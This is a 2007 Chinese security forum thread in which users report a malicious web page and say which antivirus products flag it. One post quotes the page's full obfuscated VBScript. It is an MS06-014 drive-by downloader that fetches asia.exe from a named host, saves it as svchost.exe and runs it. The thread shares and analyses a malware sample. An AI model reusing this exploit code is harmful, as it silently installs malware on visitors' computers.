毒网一个

显示全部楼层 · 发表于 2007-3-27 21:41:01

探测到: 木马程序 Trojan-Downloader.VBS.Small.dk 网址: http://www.xiaoshuowang.com.cn/y.html
不知道有没有什么新鲜玩意儿，，，

显示全部楼层 · 发表于 2007-3-27 21:54:54

RP好。。。进去后只发现显示时间

显示全部楼层 · 发表于 2007-3-27 21:59:11

楼上小心，，，

我是用火狐进的，补丁都打过了，，，

显示全部楼层 · 发表于 2007-3-27 22:01:47

有恶意脚本

显示全部楼层 · 发表于 2007-3-27 22:02:47

谁给个样本？？？

显示全部楼层 · 发表于 2007-3-27 22:28:51

小红伞和费尔都报了

显示全部楼层 · 发表于 2007-3-27 22:53:43

on error resume next
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
m6="Scripti"&"ng.Fil"&"eSystemObject"
Set xasonc = document.createElement(m1)
xason = "http://www.xiaoshuowang.com.cn/asia.exe"
xasonc.setAttribute m2, m3
xasoni=m4
Set xasond = xasonc.CreateObject(xasoni,"")
yhangf="Ado"
yhangg="db."
yhangh="Str"
yhangi="eam"
xasonf=yhangf&yhangg&yhangh&yhangi
xasong=xasonf
set xasona = xasonc.createobject(xasong,"")
xasona.type = 1
xasonh="G"&"E"&"T"
xasond.Open xasonh, xason, False
xasond.Send
xason9="svchost.exe"
set xasonb = xasonc.createobject(m6,"")
set xasone = xasonb.GetSpecialFolder(2)
xasona.open
xason8="xasona.BuildPath(xasona,xason8)"
xason7="xasonb.BuildPath(xasonb,xason7)"
xason6="xasonc.BuildPath(xasond,xason6)"
xason5="xasond.BuildPath(xasonf,xason5)"
xason4="xasone.BuildPath(xasong,xason4)"
xason3="xasonf.BuildPath(xasonh,xason4)"
xason2="xasong.BuildPath(xasoni,xason3)"
xason1="xasonh.BuildPath(xasong,xason1)"
xason0="xasoni.BuildPath(xasonk,xason0)"
xason9= xasonb.BuildPath(xasone,xason9)
xasona.write xasond.responseBody
xasona.savetofile xason9,2
xasona.close
set xasone = xasonc.createobject(m5,"")
xasone.ShellExecute xason9,BBS,BBS,"o"&"p"&"e"&"n",

MS06-014网马，下载http://www.xiaoshuowang.com.cn/asia.exe

[ 本帖最后由 dikex 于 2007-3-27 22:59 编辑 ]

显示全部楼层 · 发表于 2007-3-27 22:57:37

多谢刺猬。。。。。

显示全部楼层 · 发表于 2007-3-27 23:09:20

现在卡巴完善了哦

我D盘感染的程序没有删除掉修复了感染的程序~~`

显示全部楼层 · 发表于 2007-3-28 02:47:03

毒网一个

本帖子中包含更多资源

Cyberhawk

本帖子中包含更多资源